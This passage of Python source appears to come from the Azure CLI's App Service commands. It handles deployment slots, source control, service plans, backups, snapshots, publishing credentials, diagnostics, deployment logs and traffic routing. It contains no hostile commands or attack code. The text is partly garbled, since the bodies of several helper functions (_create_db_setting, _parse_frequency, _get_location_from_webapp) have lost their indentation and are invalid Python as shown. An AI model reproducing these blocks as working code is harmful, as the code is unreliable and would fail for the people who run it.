    # return just the slot's own name, not 'app/slot'
    result.name = result.name.split('/')[-1]
    return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
    """Create a deployment slot for a function app, optionally cloning configuration."""
    Site = cmd.get_models('Site')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' function app doesn't exist".format(name))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
    # return just the slot's own name, not 'app/slot'
    result.name = result.name.split('/')[-1]
    return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
    """Copy site config, app settings and connection strings from the
    configuration source (production app or another slot) onto *slot*,
    excluding any settings marked as slot-sticky."""
    clone_from_prod = configuration_source.lower() == webapp.lower()
    site_config = get_site_configs(cmd, resource_group_name, webapp,
                                   None if clone_from_prod else configuration_source)
    _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                            'update_configuration', slot, site_config)
    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
    src_slot = None if clone_from_prod else configuration_source
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                           'list_application_settings',
                                           src_slot)
    for a in slot_cfg_names.app_setting_names or []:
        app_settings.properties.pop(a, None)
    connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                 'list_connection_strings',
                                                 src_slot)
    for a in slot_cfg_names.connection_string_names or []:
        connection_strings.properties.pop(a, None)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_application_settings',
                                app_settings.properties, slot, client)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_connection_strings',
                                connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, cd_app_type=None,
                          app_working_dir=None, nodejs_task_runner=None, python_framework=None,
                          python_version=None, cd_account_create=None, cd_project_url=None, test=None,
                          slot_swap=None, private_repo_username=None, private_repo_password=None):
    """Configure deployment source control for a site.

    Two modes: when cd_project_url is given, continuous delivery is set up
    through the VSTS provider; otherwise a plain git/mercurial source-control
    record is created (with retries, since a prior command may have caused an
    SCM-site restart that yields transient 50x errors).
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    if cd_project_url:
        # Add default values
        cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
        python_framework = 'Django' if python_framework is None else python_framework
        python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(resource_group_name)
        vsts_provider = VstsContinuousDeliveryProvider()
        cd_app_type_details = {
            'cd_app_type': cd_app_type,
            'app_working_dir': app_working_dir,
            'nodejs_task_runner': nodejs_task_runner,
            'python_framework': python_framework,
            'python_version': python_version
        }
        try:
            status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
                                                             branch, git_token, slot_swap, cd_app_type_details,
                                                             cd_project_url, cd_account_create, location, test,
                                                             private_repo_username, private_repo_password, webapp_list)
        except RuntimeError as ex:
            raise CLIError(ex)
        logger.warning(status.status_message)
        return status
    # VSTS-only parameters are invalid without a cd_project_url
    non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
                       python_version, cd_account_create, test, slot_swap]
    if any(non_vsts_params):
        raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
                       'python_version, cd_account_create, test, slot_swap')
    from azure.mgmt.web.models import SiteSourceControl, SourceControl
    if git_token:
        # cache the GitHub token at the subscription level before wiring up the repo
        sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
        client.update_source_control('GitHub', sc)
    source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'))
    # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
    for i in range(5):
        try:
            poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                             'create_or_update_source_control',
                                             slot, source_control)
            return LongRunningOperation(cmd.cli_ctx)(poller)
        except Exception as ex:  # pylint: disable=broad-except
            import re
            ex = ex_handler_factory(no_throw=True)(ex)
            # for non server errors(50x), just throw; otherwise retry 4 times
            if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                raise
            logger.warning('retrying %s/4', i + 1)
            time.sleep(5)  # retry in a moment
def update_git_token(cmd, git_token=None):
    """Update the GitHub source-control token cached in Azure app service.

    Passing no token (or an empty one) clears the existing token.
    """
    client = web_client_factory(cmd.cli_ctx)
    from azure.mgmt.web.models import SourceControl
    token = git_token if git_token else ''
    source_control = SourceControl(name='not-really-needed', source_control_name='GitHub', token=token)
    return client.update_source_control('GitHub', source_control)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Return the site's source-control configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Delete the site's source-control configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Enable local-git deployment for a site and return {'url': <git clone URL>}."""
    SiteConfigResource = cmd.get_models('SiteConfigResource')
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    site_config = SiteConfigResource(location=location)
    site_config.scm_type = 'LocalGit'
    if slot is None:
        client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
    else:
        client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
                                                            site_config, slot)
    return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a repository sync on the site; success status codes wrongly raised by the SDK are swallowed."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # Because of bad spec, sdk throws on 200. We capture it here
        if ex.status_code not in [200, 204]:
            raise ex
def list_app_service_plans(cmd, resource_group_name=None):
    """List app service plans, subscription-wide or within one resource group."""
    client = web_client_factory(cmd.cli_ctx)
    plans_api = client.app_service_plans
    # detailed=True on the subscription-wide call enables querying "numberOfSites"
    plans = list(plans_api.list(detailed=True) if resource_group_name is None
                 else plans_api.list_by_resource_group(resource_group_name))
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
                            app_service_environment=None, sku='B1', number_of_workers=None, location=None,
                            tags=None, no_wait=False):
    """Create an app service plan (Linux, Windows, or Windows-container).

    When an App Service Environment is given, the plan is placed in the ASE and
    inherits its location; otherwise the resource group's location is used when
    none is supplied. --is-linux and --hyper-v are mutually exclusive.
    """
    HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
        'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    _validate_asp_sku(app_service_environment, sku)
    if is_linux and hyper_v:
        raise CLIError('usage error: --is-linux | --hyper-v')
    client = web_client_factory(cmd.cli_ctx)
    if app_service_environment:
        if hyper_v:
            raise CLIError('Windows containers is not yet supported in app service environment')
        ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
        ase_def = HostingEnvironmentProfile(id=ase_id)
        ase_list = client.app_service_environments.list()
        ase_found = False
        # the ASE must exist in the subscription; adopt its location
        for ase in ase_list:
            if ase.id.lower() == ase_id.lower():
                location = ase.location
                ase_found = True
                break
        if not ase_found:
            raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
    else:  # Non-ASE
        ase_def = None
        if location is None:
            location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
                              per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
    return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
    """Patch the SKU tier/name and/or worker capacity on an app service plan instance."""
    if sku is None and number_of_workers is None:
        logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
    sku_def = instance.sku
    if sku is not None:
        normalized = _normalize_sku(sku)
        sku_def.tier = get_sku_name(normalized)
        sku_def.name = normalized
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    instance.sku = sku_def
    return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update a function-app plan; --max-burst is valid only for Elastic Premium plans."""
    instance = update_app_service_plan(instance, sku, number_of_workers)
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
        instance.maximum_elastic_worker_count = max_burst
    if number_of_workers is not None:
        # range-check happens after the first update above
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
                                                       number_of_workers, min_val=0, max_val=20)
    # NOTE(review): update_app_service_plan is applied a second time with the same
    # sku/workers; looks redundant but is kept as-is for behavior parity -- confirm.
    return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Return the site's scheduled-backup configuration, or a CLI error when none is set."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List the existing backups of a webapp (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
                                   slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup of a webapp, optionally including a database."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    # drop a user-supplied '.zip' suffix from the backup name
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_request = BackupRequest(backup_name=backup_name,
                                   storage_account_url=storage_account_url, databases=db_setting)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the scheduled-backup configuration for a webapp.

    Arguments left as None fall back to the currently-stored schedule. When no
    schedule exists yet, storage URL, frequency, retention and retain-one must
    all be supplied (enforced below), so the fallbacks are never reached.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    # normalize the backup name: strip '.zip', default to '<app>_<UTC timestamp>'
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except DefaultErrorResponseException:
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # the flag arrives as a string; normalize to bool
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    # carry over database settings from the existing configuration when present
    if configuration and configuration.databases:
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a webapp from a backup blob in the given storage container."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    # backup blobs carry a '.zip' extension; append it when the user omitted it
    storage_blob_name = backup_name
    if not storage_blob_name.lower().endswith('.zip'):
        storage_blob_name += '.zip'
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    restore_request = RestoreRequest(storage_account_url=storage_account_url,
                                     blob_name=storage_blob_name, overwrite=overwrite,
                                     site_name=target_name, databases=db_setting,
                                     ignore_conflicting_host_names=ignore_hostname_conflict)
    # NOTE(review): the positional 0 presumably is the backup id expected by the SDK -- confirm
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List the restorable snapshots of a webapp (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
                                   slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore a site from a snapshot, either its own or another app's.

    With both source_resource_group and source_name, restores across apps
    (overwrite=False); with neither, overwrites the app with its own snapshot.
    Supplying only one of the pair is a usage error.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    if all([source_resource_group, source_name]):
        # Restore from source app to target app
        sub_id = get_subscription_id(cmd.cli_ctx)
        source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
                    "/providers/Microsoft.Web/sites/" + source_name
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        source = SnapshotRecoverySource(id=source_id)
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
                                         recover_configuration=recover_config)
        if slot:
            return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
        return client.web_apps.restore_snapshot(resource_group_name, name, request)
    if any([source_resource_group, source_name]):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    # Overwrite app with its own snapshot
    request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
    """Return the Azure location of the given resource group."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    group = client.resource_groups.get(resource_group_name)
    return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
    """Return the locations where the Microsoft.Web 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    for resource_type in web_provider.resource_types:
        if resource_type.resource_type == 'deletedSites':
            return resource_type.locations
    return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the local-git clone URL as scheme://publishing-user@scm-host/name.git."""
    user = client.get_publishing_user()
    result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    parsed = urlparse(result.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
                                      parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https URL of the site's SCM (Kudu repository) host."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    for host in webapp.host_name_ssl_states or []:
        if host.host_type == HostType.repository:
            return "https://{}".format(host.name)
    # this should not happen, but throw anyway
    raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
    """Return the subscription-level publishing user."""
    client = web_client_factory(cmd.cli_ctx)
    return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    user = User(publishing_user_name=user_name)
    if password is None:
        # prompt interactively; fail clearly when no TTY is attached
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user.publishing_password = password
    return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the site's publishing credentials (resolved via .result() on the returned operation)."""
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_credentials', slot)
    return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Return the site's publishing profiles.

    :param xml: when True, return the raw XML payload instead of parsed dicts.
    """
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    # join once instead of quadratic '+=' concatenation over the byte stream
    full_xml = ''.join(chunk.decode() for chunk in content)
    if not xml:
        profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
        # Bug fix: xmltodict returns a single dict (not a list) when only one
        # publishProfile element exists; iterating it would yield key strings
        # and crash below.
        if not isinstance(profiles, list):
            profiles = [profiles]
        converted = []
        for profile in profiles:
            new = {}
            for key in profile:
                # strip the leading '@' xmltodict put in for attributes
                new[key.lstrip('@')] = profile[key]
            converted.append(new)
        return converted
    return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Set the DOCKER_ENABLE_CI app setting and return the resulting CD webhook info."""
    settings = []
    settings.append("DOCKER_ENABLE_CI=" + enable)
    update_app_settings(cmd, resource_group_name, name, settings, slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Report whether Docker CI is enabled and, if so, the docker webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        cd_settings['CI_CD_URL'] = credentials.scm_uri + '/docker/hook' if credentials else ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the site's URL in the local browser; optionally start streaming its logs."""
    url = _get_url(cmd, resource_group_name, name, slot)
    open_page_in_browser(url)
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Return the site's browse URL, preferring https when any SSL binding is enabled."""
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL incase a domain is assigned
    ssl_host = next((h for h in site.host_name_ssl_states
                     if h.ssl_state != SslState.disabled), None)
    return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure site diagnostics: application logs, web-server/container logs,
    detailed error messages, and failed-request tracing.

    Options left as None keep their current server-side values (the
    corresponding config object is sent as None).
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location
    application_logs = None
    if application_logging is not None:
        # disabled -> level 'Off'; enabled without an explicit level defaults to 'Error'
        if not application_logging:
            level = 'Off'
        elif level is None:
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level=level)
        application_logs = ApplicationLogsConfig(file_system=fs_log)
    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Return the site's diagnostic-logs configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Fetch the Kudu log for a specific deployment, or for the most recent one
    when no deployment id is given. Returns [] when no log is available."""
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # no id given: list deployments and pick the newest one's log_url
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))
        sorted_logs = sorted(
            response.json(),
            key=lambda x: x['start_time'],
            reverse=True
        )
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')
    if deployment_log_url:
        response = requests.get(deployment_log_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployment_log_url, response.status_code, response.reason))
        return response.json()
    return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List the deployments recorded by the Kudu (SCM) site of an app/slot.

    Returns the parsed JSON array from the /api/deployments/ endpoint, or []
    when the site reports none. Raises CLIError on a non-200 response.
    """
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    import urllib3
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    import requests
    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        # Fix: report the URL that was actually queried (was scm_url), matching
        # the error style of show_deployment_log above.
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable or disable auto-swap on a deployment slot (target defaults to 'production')."""
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        slot_cfg.auto_swap_slot_name = ''
    else:
        slot_cfg.auto_swap_slot_name = auto_swap_slot or 'production'
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, slot_cfg, slot)
def list_slots(cmd, resource_group_name, webapp):
    """List deployment slots, trimming the 'app/slot' names and exposing the plan name."""
    client = web_client_factory(cmd.cli_ctx)
    result = []
    for s in client.web_apps.list_slots(resource_group_name, webapp):
        s.name = s.name.split('/')[-1]
        # surface the plan name instead of the raw server farm resource id
        setattr(s, 'app_service_plan', parse_resource_id(s.server_farm_id)['name'])
        del s.server_farm_id
        result.append(s)
    return result
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
    """Swap, preview-swap, or reset a slot swap (target defaults to production)."""
    client = web_client_factory(cmd.cli_ctx)
    if action == 'swap':
        return client.web_apps.swap_slot_slot(resource_group_name, webapp,
                                              slot, (target_slot or 'production'), True)
    if action == 'preview':
        if target_slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                   webapp, slot, True)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                             slot, target_slot, True)
    # any other action resets both the source slot and the target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete one deployment slot of a web app."""
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    web_client_factory(cmd.cli_ctx).web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Set slot traffic routing from 'slotname=percentage' entries.

    Replaces all existing ramp-up rules and returns the new rule list.
    """
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # 'myapp.azurewebsites.net' -> prefix 'myapp', rest 'azurewebsites.net'
    host_prefix, host_rest = site.default_host_name.split('.', 1)
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        # a slot is reachable at '<app>-<slot>.<domain>'
        rules.append(RampUpRule(action_host_name=host_prefix + "-" + slot + '.' + host_rest,
                                reroute_percentage=float(percentage),
                                name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Show the current traffic-routing (ramp-up) rules of a web app."""
    return get_site_configs(cmd, resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all routing rules so every request goes to production."""
